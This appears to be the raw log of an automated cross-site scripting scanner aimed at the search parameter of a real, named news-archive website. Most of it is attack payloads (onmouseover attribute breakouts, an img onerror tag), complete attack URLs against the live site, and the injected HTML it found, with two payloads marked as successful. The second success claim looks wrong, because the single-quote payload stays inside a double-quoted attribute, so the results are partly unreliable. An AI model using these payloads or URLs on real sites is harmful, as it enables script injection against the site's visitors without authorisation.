http://www.drudgereportarchives.com/dsp/update_linkDecay.htm

GET Params:[1]
['searchFor']
_______________________________________________________________________________________________________
https://www.drudgereportArchives.com/dsp/search.htm?searchFor=(uvw"xyz'yxz</zxy

----------------------------------------------------------------------------------
Attribute Context: [1]
<input type="Text" class="dra" name="searchFor" size="20" maxlength="500" value="(uvw"xyz'yxz</zxy">

----------------------------------------------------------------------------------
HTML Context: [1]
<strong>(uvw"xyz'yxz</zxy</strong>

----------------------------------------------------------------------------------
Script Context: [0]

----------------------------------------------------------------------------------
URI Context: [0]

----------------------------------------------------------------------------------


ENCODING     Presence	"	'	<	( 
ATTR:		True	False	False	False	False

Attack Payloads for ATTR
['" onmouseover="alert(1)', "' onmouseover='alert(1)"]

ATTR Attack Url: https://www.drudgereportArchives.com/dsp/search.htm?searchFor=" onmouseover="alert(1)

=> ATTACK SUCCESSFUL with Payload: " onmouseover="alert(1)
Detection of Payload: 
<input type="Text" class="dra" name="searchFor" size="20" maxlength="500" value="" onmouseover="alert(1)">

ATTR Attack Url: https://www.drudgereportArchives.com/dsp/search.htm?searchFor=' onmouseover='alert(1)

=> ATTACK SUCCESSFUL with Payload: ' onmouseover='alert(1)
Detection of Payload: 
<input type="Text" class="dra" name="searchFor" size="20" maxlength="500" value="' onmouseover='alert(1)">
ENCODING     Presence	"	'	<	( 
HTML:		True	False	False	False	False

Attack Payloads for HTML
['<img src=x onerror="alert(1)">']

HTML Attack Url: https://www.drudgereportArchives.com/dsp/search.htm?searchFor=<img src=x onerror="alert(1)">

 ______ UnSuccessful with payload: <img src=x onerror="alert(1)">

